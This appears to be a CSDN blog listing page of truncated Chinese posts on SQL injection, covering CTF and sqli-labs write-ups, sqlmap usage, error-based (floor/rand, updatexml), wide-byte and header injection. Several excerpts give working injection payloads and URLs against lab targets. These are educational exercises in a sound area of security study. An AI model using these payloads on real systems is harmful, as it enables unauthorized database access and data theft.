![](https://img-blog.csdnimg.cn/20201014180756724.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
sql
暮秋初九
专注于web漏洞挖掘、内网渗透、免杀和代码审计,感谢各位师傅的关注!网安之路漫长,与君共勉!vx公众号:不懂安全的果冻
展开
-
sqlmap--分析---less-1
wireshark、sqlmap为了避免被 waf 或者日志里面记录,我们一般可以添加一个 --random-agent。在我们的服务器日志也可以看到大量的请求。很容易识别出是sqlmap在扫描。使用-technique参数来指定我们的注入分类。一般sqlmap有以下几种注入:--technique=TECH.. SQL injection techniques to use (def...原创 2020-03-09 17:59:39 · 1102 阅读 · 0 评论 -
墨者学院MySQL--sql注入靶场
这几天做题的时候发现了一个靶场,先做了一个SQL注入,怎么说呢,这个靶场环境还可以,但是个人感觉最后的 key获取,有点脑洞,没有太大的实际意义背离了实际的初衷,不说了直接上wp:首先找注入点:http://219.153.49.228:40084/new_list.php?id=1‘// id=1的时候返回正常,id=1’的时候返回错误,说明存在sql注入。http://219.153...原创 2019-07-08 07:06:24 · 1620 阅读 · 0 评论 -
墨者 - SQL注入漏洞测试(布尔盲注)
**一、报数据库名字**1.根据浮动的通告进度条,找到sql注入点。内容不变,判断是数字型注入。http://219.153.49.228:44199/new_list.php?id=1 and 1=1 --+2.然后开始判断数据库名字的长度,1,2,3…内容空白。一直试,试到长度为10http://219.153.49.228:44199/new_list.php?id=1%...原创 2019-07-08 20:27:27 · 1405 阅读 · 0 评论 -
BUGKU-----成绩单
放暑假的第三天,开启暑假的刷题之路,怎么说呢,学了三个月的安全,还是需要打一下基础,所以就来bugku刷题咯。拿道题,一看就是sql注入啦。啥都不说直接上payload。**基础知识:**在做题之前必须要说一下基础知识:mysql中有一个数据库information里面有三个表,每个表中都有字段。如上图1' //1'报错说明存在注入啦。2.1'--+ //我们加上注释之...原创 2019-07-04 18:27:45 · 192 阅读 · 0 评论 -
攻防世界---NewsCenter
废话不多说,直接上思路。**手工注入:**1' //报错,判断字段:1' order by 3# //最终我们得到是三个字段,在这里们用--+代替#,竟然报错。回显字段:-1' union select 1,2,3#爆出数据库(两种方法):-1' union select 1,2,database()#-1' union select 1,2,group_conc...原创 2019-07-15 19:39:23 · 491 阅读 · 0 评论 -
Mysql报错注入原理分析(count()、rand()、group by)
0x00 疑问一直在用mysql数据库报错注入方法,但为何会报错?百度谷歌知乎了一番,发现大家都是把官网的结论发一下截图,然后执行sql语句证明一下结论,但是没有人去深入研究为什么rand不能和order by一起使用,也没彻底说明三者同时使用报错的原理。**0x01 位置问题?**select count(*),(floor(rand(0)2))x from information...原创 2019-07-18 20:21:47 · 374 阅读 · 1 评论 -
sql-liab--Less5
1.报表名字http://43.247.91.228:84/Less-5/?id=1%27%20union%20select%20count(*),concat(0x3a,0x3a,(select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%203,1),0x3...原创 2019-07-19 18:42:03 · 398 阅读 · 0 评论 -
实验吧------看起来有点难
1.拿到题目我先试一下admin密码随便给我们返回一下信息。2.接着我们随便输入一个用户名,显示数据库错误。我们又随便输入了一个账户,同样也是显示数据库连接错误,所以我们猜测用户名只能是admin。注入点应该是admin字段,测试一下过滤,试了一下?admin=admin’ union select 1,2,3 --+&pass=admin&action=login,发现过滤了...原创 2019-07-20 19:54:09 · 157 阅读 · 0 评论 -
报错注入
1、floor函数因为之前讲双查询语句时,就把floor函数报错也进行了讲解,这里就不再重复。忘记的翻翻我的其他博客(sql分类)这里贴个sql注入的floor语句公式:and (select 1 from(select count(),concat(version(),floor(rand(0)2))x from information_schema.tables group by x)a...原创 2019-07-23 08:14:38 · 433 阅读 · 0 评论 -
实验吧 WEB 加了料的报错注入
打开页面是post注入,又是报错注入。所以就用到了burp,后来发现burp不好用,加了消息头也不好用,不知道为啥。既然是post那么就用脚本吧。1.首先正常传参:import requestsurl="http://ctf5.shiyanbar.com/web/baocuo/index.php"r=requests.session()s=r.post(url,data={'userna...原创 2019-07-23 09:20:29 · 592 阅读 · 3 评论 -
bugku----这是一个神奇的登陆框
此题是sqlmap+burp结合完成的,打开一看是一个登陆框架,url显示sql,想必是post型的sql注入。查看注入点:首先burp抓包,抓到包后选择存到txt文件中:(随便输入账号密码):root@kali:~# sqlmap -r '/root/桌面/2.txt' -p admin_name --dbs//-r是读文件 后面是刚才保存的绝对路径,-p是参数,也就是注入点(选了a...原创 2019-07-07 20:07:42 · 500 阅读 · 0 评论 -
bugku--多次---如何判断过滤了什么字符?
打开网页,发现url中一id参数,不断增加参数,会发现页面回显不同,知道第五个提示要用sql注入。按照常规思路开始注入:http://123.206.87.240:9004/1ndex.php?id=5%27竟然也报错醉了,一看就是过滤了某些字符啊,但是一个一个试字符,肯定不行,那么该怎么判断过滤了什么字符呢?在这里get新技能:运用异或判断:就是说:两个条件相同(同真或同假)即为...原创 2019-07-07 19:18:52 · 390 阅读 · 0 评论 -
sqlmap的使用之sql-lab
splmap的五种独特的sql注入技术:基于布尔类型的盲注基于时间的盲注基于报错的盲注联合查询注入堆查询注入在进行注入之前要说明两点:第一我们在进行注入的时候需要把url中的127.0.0.1改为本机的ip第二在注入的时候一定要带上参数。接下来我们对sql-lab进行sqlmap使用:0x01 Less-1一、sqlmap.py -u http://192...原创 2019-05-08 10:02:48 · 2287 阅读 · 0 评论 -
CGCTTF-GBK Injection
查看题目给的信息,一看就知道是宽字节注入啦。http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1�' 页面报错判断字段,4的时候报错:http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1�' order by 4--+2的时候,回显正常:http://chinalover.sina...原创 2019-05-13 18:40:43 · 351 阅读 · 0 评论 -
sql-lib注入天书-Less-1
1.尝试报错我们在1之后加上‘,根据反馈信息1’后面多了一个‘所以我们想办法闭合用 'or 1=1 --+。2.接下来我们进行Order by 对前面的数据进行排序(http://192.168.83.129/sqli-labs-master/Less-1/?id=1’ order by 3 --+),我们用order by 3 --+发现数据回显正常,但是我们发现用order by 4 --...原创 2019-05-06 16:04:03 · 3798 阅读 · 1 评论 -
UpdateXml() MYSQL显错注入
UpdateXml() MYSQL显错注入在学习之前,需要先了解 UpdateXml() 。UPDATEXML (XML_document, XPath_string, new_value);第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找...原创 2019-05-06 17:24:42 · 617 阅读 · 0 评论 -
bugku-login1之sql column truncation(列截断)
前言:在MySQL的配置选项中,有一个sql_mode选项。当mysql的sql-mode设置为default时,即没有开启STARICT_ALL_TABLES选项时候,MYsql对用户插入的超长值只提示warning,而不是erro(如果是erro则插入不成功),这可能会导致发生一些“截断”问题。开始测试:首先开启strict模式。在strict模式下,因为输入的字符串超出了长度限制,因...原创 2019-05-19 15:30:41 · 283 阅读 · 0 评论 -
宽字节注入-sql-lib
**宽字节注入原理:**一、原理:mysql 在使用 GBK 编码的时候,会认为两个字符为一个汉字,例如%aa%5c 就是一个汉字(前一个 ascii 码大于 128 才能到汉字的范围)。我们在过滤 ’ 的时候,往往利用的思路是将 ‘ 转换为 \’ 。因此我们在此想办法将 ’ 前面添加的 \ 除掉,一般有两种思路:1、%df 吃掉 \ 具体的原因是 urlencode(’) = %5c%...原创 2019-05-07 12:48:43 · 473 阅读 · 0 评论 -
addslashes()与mysql_real_escape_string()在sql注入中的应用
0x01:addslashes() 函数返回在预定义字符之前添加反斜杠的字符串。预定义字符是:单引号(’)双引号(")反斜杠(\)提示:该函数可用于为存储在数据库中的字符串以及数据库查询语句准备字符串。Addslashes()函数我们可以利用%df 进行绕过。(即所谓的宽字节注入)使用 addslashes(),我们需要将 mysql_query 设置为 binary 的方式,才能防...原创 2019-05-07 13:20:03 · 1042 阅读 · 0 评论 -
sql-lib之order by 注入
前言:如何判断是否存在order by之后的注入?在参数后面加个asc(结果升序显示)、desc(结果降序显示)来观察其顺序是否改变就行了。顺序改变了,所以存在注入。接下来我们进行正式注入:一、首先我们判断order by后面接的参数有没有影响,尝试注入:left(version(),1)和right(version(),1),发现结果没影响,说明后面参数随意。这里我们解释一下这两个...原创 2019-05-07 20:01:17 · 1945 阅读 · 0 评论 -
sql-lib注入之http头注入
http头注入包括好多种:User-Agent注入User-Agent、Content-Type等只要是http包中存在的都可以进行篡改。在这再说下User-Agent的头注入和Content-Type的头注入,其他的就不详细赘述。基本原理大同小异。最后会进行总结。一般使用user-Agent,有两种场景一是记录访问者的信息,如什么浏览器、操作系统版本等。二是获取客户的user-Agent...原创 2019-05-07 21:01:08 · 454 阅读 · 0 评论 -
sql-lib注入之Advanced injection(Less24-30)
本关:Sql 语句为sql="SELECT∗FROMusersWHEREid=′sql="SELECT * FROM users WHERE id='sql="SELECT∗FROMusersWHEREid=′id’ LIMIT 0,1";此处主要是在获取 id 参数时进行了#,–注释符号的过滤。注入:0x01:http://192.1...原创 2019-05-13 15:20:34 · 381 阅读 · 0 评论 -
sql-lab关于limit注入(网络信息安全实验室 第四题)
关于limit注入(记一次sql注入)1.函数解释MySQL 5.1.5版本中添加了对XML文档进行查询和修改的函数,分别是ExtractValue()和UpdateXML()1)extractvalue():从目标XML中返回包含所查询值的字符串。 EXTRACTVALUE (XML_document, XPath_string); 第一个参数:XML_document是Str...原创 2019-04-27 13:15:52 · 1968 阅读 · 0 评论